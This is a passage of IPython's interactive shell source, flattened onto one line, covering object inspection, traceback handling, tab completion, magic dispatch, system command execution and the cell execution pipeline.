**kw): """Generic interface to the inspector system. This function is meant to be called by pdef, pdoc & friends. """ info = self._object_find(oname, namespaces) docformat = sphinxify if self.sphinxify_docstring else None if info.found: pmethod = getattr(self.inspector, meth) # TODO: only apply format_screen to the plain/text repr of the mime # bundle. formatter = format_screen if info.ismagic else docformat if meth == 'pdoc': pmethod(info.obj, oname, formatter) elif meth == 'pinfo': pmethod( info.obj, oname, formatter, info, enable_html_pager=self.enable_html_pager, **kw ) else: pmethod(info.obj, oname) else: print('Object `%s` not found.' % oname) return 'not found' # so callers can take other action def object_inspect(self, oname, detail_level=0): """Get object info about oname""" with self.builtin_trap: info = self._object_find(oname) if info.found: return self.inspector.info(info.obj, oname, info=info, detail_level=detail_level ) else: return oinspect.object_info(name=oname, found=False) def object_inspect_text(self, oname, detail_level=0): """Get object info as formatted text""" return self.object_inspect_mime(oname, detail_level)['text/plain'] def object_inspect_mime(self, oname, detail_level=0): """Get object info as a mimebundle of formatted representations. A mimebundle is a dictionary, keyed by mime-type. It must always have the key `'text/plain'`. """ with self.builtin_trap: info = self._object_find(oname) if info.found: return self.inspector._get_info(info.obj, oname, info=info, detail_level=detail_level ) else: raise KeyError(oname) #------------------------------------------------------------------------- # Things related to history management #------------------------------------------------------------------------- def init_history(self): """Sets up the command history, and starts regular autosaves.""" self.history_manager = HistoryManager(shell=self, parent=self) self.configurables.append(self.history_manager) #------------------------------------------------------------------------- # Things related to exception handling and tracebacks (not debugging) #------------------------------------------------------------------------- debugger_cls = Pdb def set_custom_exc(self, exc_tuple, handler): """set_custom_exc(exc_tuple, handler) Set a custom exception handler, which will be called if any of the exceptions in exc_tuple occur in the mainloop (specifically, in the run_code() method). Parameters ---------- exc_tuple : tuple of exception classes A *tuple* of exception classes, for which to call the defined handler. It is very important that you use a tuple, and NOT A LIST here, because of the way Python's except statement works. If you only want to trap a single exception, use a singleton tuple:: exc_tuple == (MyCustomException,) handler : callable handler must have the following signature:: def my_handler(self, etype, value, tb, tb_offset=None): ... return structured_traceback Your handler must return a structured traceback (a list of strings), or None. This will be made into an instance method (via types.MethodType) of IPython itself, and it will be called if any of the exceptions listed in the exc_tuple are caught. If the handler is None, an internal basic one is used, which just prints basic info. To protect IPython from crashes, if your handler ever raises an exception or returns an invalid result, it will be immediately disabled. WARNING: by putting in your own exception handler into IPython's main execution loop, you run a very good chance of nasty crashes. This facility should only be used if you really know what you are doing.""" if not isinstance(exc_tuple, tuple): raise TypeError("The custom exceptions must be given as a tuple.") def validate_stb(stb): """validate structured traceback return type return type of CustomTB *should* be a list of strings, but allow single strings or None, which are harmless. This function will *always* return a list of strings, and will raise a TypeError if stb is inappropriate. """ msg = "CustomTB must return list of strings, not %r" % stb if stb is None: return [] elif isinstance(stb, str): return [stb] elif not isinstance(stb, list): raise TypeError(msg) # it's a list for line in stb: # check every element if not isinstance(line, str): raise TypeError(msg) return stb if handler is None: wrapped = dummy_handler else: def wrapped(self,etype,value,tb,tb_offset=None): """wrap CustomTB handler, to protect IPython from user code This makes it harder (but not impossible) for custom exception handlers to crash IPython. """ try: stb = handler(self,etype,value,tb,tb_offset=tb_offset) return validate_stb(stb) except: # clear custom handler immediately self.set_custom_exc((), None) print("Custom TB Handler failed, unregistering", file=sys.stderr) # show the exception in handler first stb = self.InteractiveTB.structured_traceback(*sys.exc_info()) print(self.InteractiveTB.stb2text(stb)) print("The original exception:") stb = self.InteractiveTB.structured_traceback( (etype,value,tb), tb_offset=tb_offset ) return stb self.CustomTB = types.MethodType(wrapped,self) self.custom_exceptions = exc_tuple def excepthook(self, etype, value, tb): """One more defense for GUI apps that call sys.excepthook. GUI frameworks like wxPython trap exceptions and call sys.excepthook themselves. I guess this is a feature that enables them to keep running after exceptions that would otherwise kill their mainloop. This is a bother for IPython which excepts to catch all of the program exceptions with a try: except: statement. Normally, IPython sets sys.excepthook to a CrashHandler instance, so if any app directly invokes sys.excepthook, it will look to the user like IPython crashed. In order to work around this, we can disable the CrashHandler and replace it with this excepthook instead, which prints a regular traceback using our InteractiveTB. In this fashion, apps which call sys.excepthook will generate a regular-looking exception from IPython, and the CrashHandler will only be triggered by real IPython crashes. This hook should be used sparingly, only in places which are not likely to be true IPython errors. """ self.showtraceback((etype, value, tb), tb_offset=0) def _get_exc_info(self, exc_tuple=None): """get exc_info from a given tuple, sys.exc_info() or sys.last_type etc. Ensures sys.last_type,value,traceback hold the exc_info we found, from whichever source. raises ValueError if none of these contain any information """ if exc_tuple is None: etype, value, tb = sys.exc_info() else: etype, value, tb = exc_tuple if etype is None: if hasattr(sys, 'last_type'): etype, value, tb = sys.last_type, sys.last_value, \ sys.last_traceback if etype is None: raise ValueError("No exception to find") # Now store the exception info in sys.last_type etc. # WARNING: these variables are somewhat deprecated and not # necessarily safe to use in a threaded environment, but tools # like pdb depend on their existence, so let's set them. If we # find problems in the field, we'll need to revisit their use. sys.last_type = etype sys.last_value = value sys.last_traceback = tb return etype, value, tb def show_usage_error(self, exc): """Show a short message for UsageErrors These are special exceptions that shouldn't show a traceback. """ print("UsageError: %s" % exc, file=sys.stderr) def get_exception_only(self, exc_tuple=None): """ Return as a string (ending with a newline) the exception that just occurred, without any traceback. """ etype, value, tb = self._get_exc_info(exc_tuple) msg = traceback.format_exception_only(etype, value) return ''.join(msg) def showtraceback(self, exc_tuple=None, filename=None, tb_offset=None, exception_only=False, running_compiled_code=False): """Display the exception that just occurred. If nothing is known about the exception, this is the method which should be used throughout the code for presenting user tracebacks, rather than directly invoking the InteractiveTB object. A specific showsyntaxerror() also exists, but this method can take care of calling it if needed, so unless you are explicitly catching a SyntaxError exception, don't try to analyze the stack manually and simply call this method.""" try: try: etype, value, tb = self._get_exc_info(exc_tuple) except ValueError: print('No traceback available to show.', file=sys.stderr) return if issubclass(etype, SyntaxError): # Though this won't be called by syntax errors in the input # line, there may be SyntaxError cases with imported code. self.showsyntaxerror(filename, running_compiled_code) elif etype is UsageError: self.show_usage_error(value) else: if exception_only: stb = ['An exception has occurred, use %tb to see ' 'the full traceback.\n'] stb.extend(self.InteractiveTB.get_exception_only(etype, value)) else: try: # Exception classes can customise their traceback - we # use this in IPython.parallel for exceptions occurring # in the engines. This should return a list of strings. stb = value._render_traceback_() except Exception: stb = self.InteractiveTB.structured_traceback(etype, value, tb, tb_offset=tb_offset) self._showtraceback(etype, value, stb) if self.call_pdb: # drop into debugger self.debugger(force=True) return # Actually show the traceback self._showtraceback(etype, value, stb) except KeyboardInterrupt: print('\n' + self.get_exception_only(), file=sys.stderr) def _showtraceback(self, etype, evalue, stb): """Actually show a traceback. Subclasses may override this method to put the traceback on a different place, like a side channel. """ print(self.InteractiveTB.stb2text(stb)) def showsyntaxerror(self, filename=None, running_compiled_code=False): """Display the syntax error that just occurred. This doesn't display a stack trace because there isn't one. If a filename is given, it is stuffed in the exception instead of what was there before (because Python's parser always uses "<string>" when reading from a string). If the syntax error occurred when running a compiled code (i.e. running_compile_code=True), longer stack trace will be displayed. """ etype, value, last_traceback = self._get_exc_info() if filename and issubclass(etype, SyntaxError): try: value.filename = filename except: # Not the format we expect; leave it alone pass # If the error occurred when executing compiled code, we should provide full stacktrace. elist = traceback.extract_tb(last_traceback) if running_compiled_code else [] stb = self.SyntaxTB.structured_traceback(etype, value, elist) self._showtraceback(etype, value, stb) # This is overridden in TerminalInteractiveShell to show a message about # the %paste magic. def showindentationerror(self): """Called by _run_cell when there's an IndentationError in code entered at the prompt. This is overridden in TerminalInteractiveShell to show a message about the %paste magic.""" self.showsyntaxerror() #------------------------------------------------------------------------- # Things related to readline #------------------------------------------------------------------------- def init_readline(self): """DEPRECATED Moved to terminal subclass, here only to simplify the init logic.""" # Set a number of methods that depend on readline to be no-op warnings.warn('`init_readline` is no-op since IPython 5.0 and is Deprecated', DeprecationWarning, stacklevel=2) self.set_custom_completer = no_op @skip_doctest def set_next_input(self, s, replace=False): """ Sets the 'default' input string for the next command line. Example:: In [1]: _ip.set_next_input("Hello Word") In [2]: Hello Word_ # cursor is here """ self.rl_next_input = s def _indent_current_str(self): """return the current level of indentation as a string""" return self.input_splitter.get_indent_spaces() * ' ' #------------------------------------------------------------------------- # Things related to text completion #------------------------------------------------------------------------- def init_completer(self): """Initialize the completion machinery. This creates completion machinery that can be used by client code, either interactively in-process (typically triggered by the readline library), programmatically (such as in test suites) or out-of-process (typically over the network by remote frontends). """ from IPython.core.completer import IPCompleter from IPython.core.completerlib import (module_completer, magic_run_completer, cd_completer, reset_completer) self.Completer = IPCompleter(shell=self, namespace=self.user_ns, global_namespace=self.user_global_ns, parent=self, ) self.configurables.append(self.Completer) # Add custom completers to the basic ones built into IPCompleter sdisp = self.strdispatchers.get('complete_command', StrDispatch()) self.strdispatchers['complete_command'] = sdisp self.Completer.custom_completers = sdisp self.set_hook('complete_command', module_completer, str_key = 'import') self.set_hook('complete_command', module_completer, str_key = 'from') self.set_hook('complete_command', module_completer, str_key = '%aimport') self.set_hook('complete_command', magic_run_completer, str_key = '%run') self.set_hook('complete_command', cd_completer, str_key = '%cd') self.set_hook('complete_command', reset_completer, str_key = '%reset') @skip_doctest def complete(self, text, line=None, cursor_pos=None): """Return the completed text and a list of completions. Parameters ---------- text : string A string of text to be completed on. It can be given as empty and instead a line/position pair are given. In this case, the completer itself will split the line like readline does. line : string, optional The complete line that text is part of. cursor_pos : int, optional The position of the cursor on the input line. Returns ------- text : string The actual text that was completed. matches : list A sorted list with all possible completions. The optional arguments allow the completion to take more context into account, and are part of the low-level completion API. This is a wrapper around the completion mechanism, similar to what readline does at the command line when the TAB key is hit. By exposing it as a method, it can be used by other non-readline environments (such as GUIs) for text completion. Simple usage example: In [1]: x = 'hello' In [2]: _ip.complete('x.l') Out[2]: ('x.l', ['x.ljust', 'x.lower', 'x.lstrip']) """ # Inject names into __builtin__ so we can complete on the added names. with self.builtin_trap: return self.Completer.complete(text, line, cursor_pos) def set_custom_completer(self, completer, pos=0) -> None: """Adds a new custom completer function. The position argument (defaults to 0) is the index in the completers list where you want the completer to be inserted. `completer` should have the following signature:: def completion(self: Completer, text: string) -> List[str]: raise NotImplementedError It will be bound to the current Completer instance and pass some text and return a list with current completions to suggest to the user. """ newcomp = types.MethodType(completer, self.Completer) self.Completer.custom_matchers.insert(pos,newcomp) def set_completer_frame(self, frame=None): """Set the frame of the completer.""" if frame: self.Completer.namespace = frame.f_locals self.Completer.global_namespace = frame.f_globals else: self.Completer.namespace = self.user_ns self.Completer.global_namespace = self.user_global_ns #------------------------------------------------------------------------- # Things related to magics #------------------------------------------------------------------------- # Defined here so that it's included in the documentation @functools.wraps(magic.MagicsManager.register_function) def run_line_magic(self, magic_name, line, _stack_depth=1): """Execute the given line magic. Parameters ---------- magic_name : str Name of the desired magic function, without '%' prefix. line : str The rest of the input line as a single string. _stack_depth : int If run_line_magic() is called from magic() then _stack_depth=2. This is added to ensure backward compatibility for use of 'get_ipython().magic()' """ fn = self.find_line_magic(magic_name) if fn is None: cm = self.find_cell_magic(magic_name) etpl = "Line magic function `%%%s` not found%s." extra = '' if cm is None else (' (But cell magic `%%%%%s` exists, ' 'did you mean that instead?)' % magic_name ) raise UsageError(etpl % (magic_name, extra)) else: # Note: this is the distance in the stack to the user's frame. # This will need to be updated if the internal calling logic gets # refactored, or else we'll be expanding the wrong variables. # Determine stack_depth depending on where run_line_magic() has been called stack_depth = _stack_depth if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False): # magic has opted out of var_expand magic_arg_s = line else: magic_arg_s = self.var_expand(line, stack_depth) # Put magic args in a list so we can call with f(*a) syntax args = [magic_arg_s] kwargs = {} # Grab local namespace if we need it: if getattr(fn, "needs_local_scope", False): kwargs['local_ns'] = self.get_local_scope(stack_depth) with self.builtin_trap: result = fn(*args, **kwargs) return result def get_local_scope(self, stack_depth): """Get local scope at given stack depth. Parameters ---------- stack_depth : int Depth relative to calling frame """ return sys._getframe(stack_depth + 1).f_locals def run_cell_magic(self, magic_name, line, cell): """Execute the given cell magic. Parameters ---------- magic_name : str Name of the desired magic function, without '%' prefix. line : str The rest of the first input line as a single string. cell : str The body of the cell as a (possibly multiline) string. """ fn = self.find_cell_magic(magic_name) if fn is None: lm = self.find_line_magic(magic_name) etpl = "Cell magic `%%{0}` not found{1}." extra = '' if lm is None else (' (But line magic `%{0}` exists, ' 'did you mean that instead?)'.format(magic_name)) raise UsageError(etpl.format(magic_name, extra)) elif cell == '': message = '%%{0} is a cell magic, but the cell body is empty.'.format(magic_name) if self.find_line_magic(magic_name) is not None: message += ' Did you mean the line magic %{0} (single %)?'.format(magic_name) raise UsageError(message) else: # Note: this is the distance in the stack to the user's frame. # This will need to be updated if the internal calling logic gets # refactored, or else we'll be expanding the wrong variables. stack_depth = 2 if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False): # magic has opted out of var_expand magic_arg_s = line else: magic_arg_s = self.var_expand(line, stack_depth) kwargs = {} if getattr(fn, "needs_local_scope", False): kwargs['local_ns'] = self.user_ns with self.builtin_trap: args = (magic_arg_s, cell) result = fn(*args, **kwargs) return result def find_line_magic(self, magic_name): """Find and return a line magic by name. Returns None if the magic isn't found.""" return self.magics_manager.magics['line'].get(magic_name) def find_cell_magic(self, magic_name): """Find and return a cell magic by name. Returns None if the magic isn't found.""" return self.magics_manager.magics['cell'].get(magic_name) def find_magic(self, magic_name, magic_kind='line'): """Find and return a magic of the given type by name. Returns None if the magic isn't found.""" return self.magics_manager.magics[magic_kind].get(magic_name) def magic(self, arg_s): """DEPRECATED. Use run_line_magic() instead. Call a magic function by name. Input: a string containing the name of the magic function to call and any additional arguments to be passed to the magic. magic('name -opt foo bar') is equivalent to typing at the ipython prompt: In[1]: %name -opt foo bar To call a magic without arguments, simply use magic('name'). This provides a proper Python function to call IPython's magics in any valid Python code you can type at the interpreter, including loops and compound statements. """ # TODO: should we issue a loud deprecation warning here? magic_name, _, magic_arg_s = arg_s.partition(' ') magic_name = magic_name.lstrip(prefilter.ESC_MAGIC) return self.run_line_magic(magic_name, magic_arg_s, _stack_depth=2) #------------------------------------------------------------------------- # Things related to macros #------------------------------------------------------------------------- def define_macro(self, name, themacro): """Define a new macro Parameters ---------- name : str The name of the macro. themacro : str or Macro The action to do upon invoking the macro. If a string, a new Macro object is created by passing the string to it. """ from IPython.core import macro if isinstance(themacro, str): themacro = macro.Macro(themacro) if not isinstance(themacro, macro.Macro): raise ValueError('A macro must be a string or a Macro instance.') self.user_ns[name] = themacro #------------------------------------------------------------------------- # Things related to the running of system commands #------------------------------------------------------------------------- def system_piped(self, cmd): """Call the given cmd in a subprocess, piping stdout/err Parameters ---------- cmd : str Command to execute (can not end in '&', as background processes are not supported. Should not be a command that expects input other than simple text. """ if cmd.rstrip().endswith('&'): # this is *far* from a rigorous test # We do not support backgrounding processes because we either use # pexpect or pipes to read from. Users can always just call # os.system() or use ip.system=ip.system_raw # if they really want a background process. raise OSError("Background processes not supported.") # we explicitly do NOT return the subprocess status code, because # a non-None value would trigger :func:`sys.displayhook` calls. # Instead, we store the exit_code in user_ns. self.user_ns['_exit_code'] = system(self.var_expand(cmd, depth=1)) def system_raw(self, cmd): """Call the given cmd in a subprocess using os.system on Windows or subprocess.call using the system shell on other platforms. Parameters ---------- cmd : str Command to execute. """ cmd = self.var_expand(cmd, depth=1) # protect os.system from UNC paths on Windows, which it can't handle: if sys.platform == 'win32': from IPython.utils._process_win32 import AvoidUNCPath with AvoidUNCPath() as path: if path is not None: cmd = '"pushd %s &&"%s' % (path, cmd) try: ec = os.system(cmd) except KeyboardInterrupt: print('\n' + self.get_exception_only(), file=sys.stderr) ec = -2 else: # For posix the result of the subprocess.call() below is an exit # code, which by convention is zero for success, positive for # program failure. Exit codes above 128 are reserved for signals, # and the formula for converting a signal to an exit code is usually # signal_number+128. To more easily differentiate between exit # codes and signals, ipython uses negative numbers. For instance # since control-c is signal 2 but exit code 130, ipython's # _exit_code variable will read -2. Note that some shells like # csh and fish don't follow sh/bash conventions for exit codes. executable = os.environ.get('SHELL', None) try: # Use env shell instead of default /bin/sh ec = subprocess.call(cmd, shell=True, executable=executable) except KeyboardInterrupt: # intercept control-C; a long traceback is not useful here print('\n' + self.get_exception_only(), file=sys.stderr) ec = 130 if ec > 128: ec = -(ec - 128) # We explicitly do NOT return the subprocess status code, because # a non-None value would trigger :func:`sys.displayhook` calls. # Instead, we store the exit_code in user_ns. Note the semantics # of _exit_code: for control-c, _exit_code == -signal.SIGNIT, # but raising SystemExit(_exit_code) will give status 254! self.user_ns['_exit_code'] = ec # use piped system by default, because it is better behaved system = system_piped def getoutput(self, cmd, split=True, depth=0): """Get output (possibly including stderr) from a subprocess. Parameters ---------- cmd : str Command to execute (can not end in '&', as background processes are not supported. split : bool, optional If True, split the output into an IPython SList. Otherwise, an IPython LSString is returned. These are objects similar to normal lists and strings, with a few convenience attributes for easier manipulation of line-based output. You can use '?' on them for details. depth : int, optional How many frames above the caller are the local variables which should be expanded in the command string? The default (0) assumes that the expansion variables are in the stack frame calling this function. """ if cmd.rstrip().endswith('&'): # this is *far* from a rigorous test raise OSError("Background processes not supported.") out = getoutput(self.var_expand(cmd, depth=depth+1)) if split: out = SList(out.splitlines()) else: out = LSString(out) return out #------------------------------------------------------------------------- # Things related to aliases #------------------------------------------------------------------------- #------------------------------------------------------------------------- # Things related to extensions #------------------------------------------------------------------------- #------------------------------------------------------------------------- # Things related to payloads #------------------------------------------------------------------------- #------------------------------------------------------------------------- # Things related to the prefilter #------------------------------------------------------------------------- def auto_rewrite_input(self, cmd): """Print to the screen the rewritten form of the user's command. This shows visual feedback by rewriting input lines that cause automatic calling to kick in, like:: /f x into:: ------> f(x) after the user's input prompt. This helps the user understand that the input line was transformed automatically by IPython. """ if not self.show_rewritten_input: return # This is overridden in TerminalInteractiveShell to use fancy prompts print("------> " + cmd) #------------------------------------------------------------------------- # Things related to extracting values/expressions from kernel and user_ns #------------------------------------------------------------------------- def _user_obj_error(self): """return simple exception dict for use in user_expressions """ etype, evalue, tb = self._get_exc_info() stb = self.InteractiveTB.get_exception_only(etype, evalue) exc_info = { u'status' : 'error', u'traceback' : stb, u'ename' : etype.__name__, u'evalue' : py3compat.safe_unicode(evalue), } return exc_info def _format_user_obj(self, obj): """format a user object to display dict for use in user_expressions """ data, md = self.display_formatter.format(obj) value = { 'status' : 'ok', 'data' : data, 'metadata' : md, } return value def user_expressions(self, expressions): """Evaluate a dict of expressions in the user's namespace. Parameters ---------- expressions : dict A dict with string keys and string values. The expression values should be valid Python expressions, each of which will be evaluated in the user namespace. Returns ------- A dict, keyed like the input expressions dict, with the rich mime-typed display_data of each value. """ out = {} user_ns = self.user_ns global_ns = self.user_global_ns for key, expr in expressions.items(): try: value = self._format_user_obj(eval(expr, global_ns, user_ns)) except: value = self._user_obj_error() out[key] = value return out #------------------------------------------------------------------------- # Things related to the running of code #------------------------------------------------------------------------- def ex(self, cmd): """Execute a normal python statement in user namespace.""" with self.builtin_trap: exec(cmd, self.user_global_ns, self.user_ns) def ev(self, expr): """Evaluate python expression expr in user namespace. Returns the result of evaluation """ with self.builtin_trap: return eval(expr, self.user_global_ns, self.user_ns) def safe_execfile(self, fname, *where, exit_ignore=False, raise_exceptions=False, shell_futures=False): """A safe version of the builtin execfile(). This version will never throw an exception, but instead print helpful error messages to the screen. This only works on pure Python files with the .py extension. Parameters ---------- fname : string The name of the file to be executed. where : tuple One or two namespaces, passed to execfile() as (globals,locals). If only one is given, it is passed as both. exit_ignore : bool (False) If True, then silence SystemExit for non-zero status (it is always silenced for zero status, as it is so common). raise_exceptions : bool (False) If True raise exceptions everywhere. Meant for testing. shell_futures : bool (False) If True, the code will share future statements with the interactive shell. It will both be affected by previous __future__ imports, and any __future__ imports in the code will affect the shell. If False, __future__ imports are not shared in either direction. """ fname = os.path.abspath(os.path.expanduser(fname)) # Make sure we can open the file try: with open(fname): pass except: warn('Could not open file <%s> for safe execution.' % fname) return # Find things also in current directory. This is needed to mimic the # behavior of running a script from the system command line, where # Python inserts the script's directory into sys.path dname = os.path.dirname(fname) with prepended_to_syspath(dname), self.builtin_trap: try: glob, loc = (where + (None, ))[:2] py3compat.execfile( fname, glob, loc, self.compile if shell_futures else None) except SystemExit as status: # If the call was made with 0 or None exit status (sys.exit(0) # or sys.exit() ), don't bother showing a traceback, as both of # these are considered normal by the OS: # > python -c'import sys;sys.exit(0)'; echo $? # 0 # > python -c'import sys;sys.exit()'; echo $? # 0 # For other exit status, we show the exception unless # explicitly silenced, but only in short form. if status.code: if raise_exceptions: raise if not exit_ignore: self.showtraceback(exception_only=True) except: if raise_exceptions: raise # tb offset is 2 because we wrap execfile self.showtraceback(tb_offset=2) def safe_execfile_ipy(self, fname, shell_futures=False, raise_exceptions=False): """Like safe_execfile, but for .ipy or .ipynb files with IPython syntax. Parameters ---------- fname : str The name of the file to execute. The filename must have a .ipy or .ipynb extension. shell_futures : bool (False) If True, the code will share future statements with the interactive shell. It will both be affected by previous __future__ imports, and any __future__ imports in the code will affect the shell. If False, __future__ imports are not shared in either direction. raise_exceptions : bool (False) If True raise exceptions everywhere. Meant for testing. """ fname = os.path.abspath(os.path.expanduser(fname)) # Make sure we can open the file try: with open(fname): pass except: warn('Could not open file <%s> for safe execution.' % fname) return # Find things also in current directory. This is needed to mimic the # behavior of running a script from the system command line, where # Python inserts the script's directory into sys.path dname = os.path.dirname(fname) def get_cells(): """generator for sequence of code blocks to run""" if fname.endswith('.ipynb'): from nbformat import read nb = read(fname, as_version=4) if not nb.cells: return for cell in nb.cells: if cell.cell_type == 'code': yield cell.source else: with open(fname) as f: yield f.read() with prepended_to_syspath(dname): try: for cell in get_cells(): result = self.run_cell(cell, silent=True, shell_futures=shell_futures) if raise_exceptions: result.raise_error() elif not result.success: break except: if raise_exceptions: raise self.showtraceback() warn('Unknown failure executing file: <%s>' % fname) def safe_run_module(self, mod_name, where): """A safe version of runpy.run_module(). This version will never throw an exception, but instead print helpful error messages to the screen. `SystemExit` exceptions with status code 0 or None are ignored. Parameters ---------- mod_name : string The name of the module to be executed. where : dict The globals namespace. """ try: try: where.update( runpy.run_module(str(mod_name), run_name="__main__", alter_sys=True) ) except SystemExit as status: if status.code: raise except: self.showtraceback() warn('Unknown failure executing module: <%s>' % mod_name) def run_cell(self, raw_cell, store_history=False, silent=False, shell_futures=True): """Run a complete IPython cell. Parameters ---------- raw_cell : str The code (including IPython code such as %magic functions) to run. store_history : bool If True, the raw and translated cell will be stored in IPython's history. For user code calling back into IPython's machinery, this should be set to False. silent : bool If True, avoid side-effects, such as implicit displayhooks and and logging. silent=True forces store_history=False. shell_futures : bool If True, the code will share future statements with the interactive shell. It will both be affected by previous __future__ imports, and any __future__ imports in the code will affect the shell. If False, __future__ imports are not shared in either direction. Returns ------- result : :class:`ExecutionResult` """ result = None try: result = self._run_cell( raw_cell, store_history, silent, shell_futures) finally: self.events.trigger('post_execute') if not silent: self.events.trigger('post_run_cell', result) return result def _run_cell(self, raw_cell:str, store_history:bool, silent:bool, shell_futures:bool): """Internal method to run a complete IPython cell.""" # we need to avoid calling self.transform_cell multiple time on the same thing # so we need to store some results: preprocessing_exc_tuple = None try: transformed_cell = self.transform_cell(raw_cell) except Exception: transformed_cell = raw_cell preprocessing_exc_tuple = sys.exc_info() assert transformed_cell is not None coro = self.run_cell_async( raw_cell, store_history=store_history, silent=silent, shell_futures=shell_futures, transformed_cell=transformed_cell, preprocessing_exc_tuple=preprocessing_exc_tuple, ) # run_cell_async is async, but may not actually need an eventloop. # when this is the case, we want to run it using the pseudo_sync_runner # so that code can invoke eventloops (for example via the %run , and # `%paste` magic. if self.trio_runner: runner = self.trio_runner elif self.should_run_async( raw_cell, transformed_cell=transformed_cell, preprocessing_exc_tuple=preprocessing_exc_tuple, ): runner = self.loop_runner else: runner = _pseudo_sync_runner try: return runner(coro) except BaseException as e: info = ExecutionInfo(raw_cell, store_history, silent, shell_futures) result = ExecutionResult(info) result.error_in_exec = e self.showtraceback(running_compiled_code=True) return result return def should_run_async( self, raw_cell: str, *, transformed_cell=None, preprocessing_exc_tuple=None ) -> bool: """Return whether a cell should be run asynchronously via a coroutine runner Parameters ---------- raw_cell: str The code to be executed Returns ------- result: bool Whether the code needs to be run with a coroutine runner or not .. versionadded: 7.0 """ if not self.autoawait: return False if preprocessing_exc_tuple is not None: return False assert preprocessing_exc_tuple is None if transformed_cell is None: warnings.warn( "`should_run_async` will not call `transform_cell`" " automatically in the future. Please pass the result to" " `transformed_cell` argument and any exception that happen" " during the" "transform in `preprocessing_exc_tuple` in" " IPython 7.17 and above.", DeprecationWarning, stacklevel=2, ) try: cell = self.transform_cell(raw_cell) except Exception: # any exception during transform will be raised # prior to execution return False else: cell = transformed_cell return _should_be_async(cell) async def run_cell_async( self, raw_cell: str, store_history=False, silent=False, shell_futures=True, *, transformed_cell: Optional[str] = None, preprocessing_exc_tuple: Optional[Any] = None ) -> ExecutionResult: """Run a complete IPython cell asynchronously. Parameters ---------- raw_cell : str The code (including IPython code such as %magic functions) to run. store_history : bool If True, the raw and translated cell will be stored in IPython's history. For user code calling back into IPython's machinery, this should be set to False. silent : bool If True, avoid side-effects, such as implicit displayhooks and and logging. silent=True forces store_history=False. shell_futures : bool If True, the code will share future statements with the interactive shell. It will both be affected by previous __future__ imports, and any __future__ imports in the code will affect the shell. If False, __future__ imports are not shared in either direction. transformed_cell: str cell that was passed through transformers preprocessing_exc_tuple: trace if the transformation failed. Returns ------- result : :class:`ExecutionResult` .. versionadded: 7.0 """ info = ExecutionInfo( raw_cell, store_history, silent, shell_futures) result = ExecutionResult(info) if (not raw_cell) or raw_cell.isspace(): self.last_execution_succeeded = True self.last_execution_result = result return result if silent: store_history = False if store_history: result.execution_count = self.execution_count self.events.trigger('pre_execute') if not silent: self.events.trigger('pre_run_cell', info) if transformed_cell is None: warnings.warn( "`run_cell_async` will not call `transform_cell`" " automatically in the future. Please pass the result to" " `transformed_cell` argument and any exception that happen" " during the" "transform in `preprocessing_exc_tuple` in" " IPython 7.17 and above.", DeprecationWarning, stacklevel=2, ) # If any of our input transformation (input_transformer_manager or # prefilter_manager) raises an exception, we store it in this variable # so that we can display the error after logging the input and storing # it in the history. try: cell = self.transform_cell(raw_cell) except Exception: preprocessing_exc_tuple = sys.exc_info() cell = raw_cell # cell has to exist so it can be stored/logged else: preprocessing_exc_tuple = None else: if preprocessing_exc_tuple is None: cell = transformed_cell else: cell = raw_cell # Store raw and processed history if store_history: self.history_manager.store_inputs(self.execution_count, cell, raw_cell) if not silent: self.logger.log(cell, raw_cell) # Display the exception if input processing failed. if preprocessing_exc_tuple is not None: self.showtraceback(preprocessing_exc_tuple) if store_history: self.execution_count += 1 return error_before_exec(preprocessing_exc_tuple[1]) # Our own compiler remembers the __future__ environment. If we want to # run code with a separate __future__ environment, use the default # compiler compiler = self.compile if shell_futures else self.compiler_class() _run_async = False with self.builtin_trap: cell_name = self.compile.cache( cell, self.execution_count, raw_code=raw_cell ) with self.display_trap: # Compile to bytecode try: if sys.version_info < (3,8) and self.autoawait: if _should_be_async(cell): # the code AST below will not be user code: we wrap it # in an `async def`. This will likely make some AST # transformer below miss some transform opportunity and # introduce a small coupling to run_code (in which we # bake some assumptions of what _ast_asyncify returns. # they are ways around (like grafting part of the ast # later: # - Here, return code_ast.body[0].body[1:-1], as well # as last expression in return statement which is # the user code part. # - Let it go through the AST transformers, and graft # - it back after the AST transform # But that seem unreasonable, at least while we # do not need it. code_ast = _ast_asyncify(cell, 'async-def-wrapper') _run_async = True else: code_ast = compiler.ast_parse(cell, filename=cell_name) else: code_ast = compiler.ast_parse(cell, filename=cell_name) except self.custom_exceptions as e: etype, value, tb = sys.exc_info() self.CustomTB(etype, value, tb) return error_before_exec(e) except IndentationError as e: self.showindentationerror() return error_before_exec(e) except (OverflowError, SyntaxError, ValueError, TypeError, MemoryError) as e: self.showsyntaxerror() return error_before_exec(e) # Apply AST transformations try: code_ast = self.transform_ast(code_ast) except InputRejected as e: self.showtraceback() return error_before_exec(e) # Give the displayhook a reference to our ExecutionResult so it # can fill in the output value. self.displayhook.exec_result = result # Execute the user code interactivity = "none" if silent else self.ast_node_interactivity if _run_async: interactivity = 'async' has_raised = await self.run_ast_nodes(code_ast.body, cell_name, interactivity=interactivity, compiler=compiler, result=result) self.last_execution_succeeded = not has_raised self.last_execution_result = result # Reset this so later displayed values do not modify the # ExecutionResult self.displayhook.exec_result = None if store_history: # Write output to the database. Does nothing unless # history output logging is enabled. self.history_manager.store_output(self.execution_count) # Each cell is a *single* input, regardless of how many lines it has self.execution_count += 1 return result def transform_cell(self, raw_cell): """Transform an input cell before parsing it. Static transformations, implemented in IPython.core.inputtransformer2, deal with things like ``%magic`` and ``!system`` commands. These run on all input. Dynamic transformations, for things like unescaped magics and the exit autocall, depend on the state of the interpreter. These only apply to single line inputs. These string-based transformations are followed by AST transformations; see :meth:`transform_ast`. """ # Static input transformations cell = self.input_transformer_manager.transform_cell(raw_cell) if len(cell.splitlines()) == 1: # Dynamic transformations - only applied for single line commands with self.builtin_trap: # use prefilter_lines to handle trailing newlines # restore trailing newline for ast.parse cell = self.prefilter_manager.prefilter_lines(cell) + '\n' lines = cell.splitlines(keepends=True) for transform in self.input_transformers_post: lines = transform(lines) cell = ''.join(lines) return cell def transform_ast(self, node): """Apply the AST transformations from self.ast_transformers Parameters ---------- node : ast.Node The root node to be transformed. Typically called with the ast.Module produced by parsing user input. Returns ------- An ast.Node corresponding to the node it was called with. Note that it may also modify the passed object, so don't rely on references to the original AST. """ for transformer in self.ast_transformers: try: node = transformer.visit(node) except InputRejected: # User-supplied AST transformers can reject an input by raising # an InputRejected. Short-circuit in this case so that we # don't unregister the transform. raise except Exception: warn("AST transformer %r 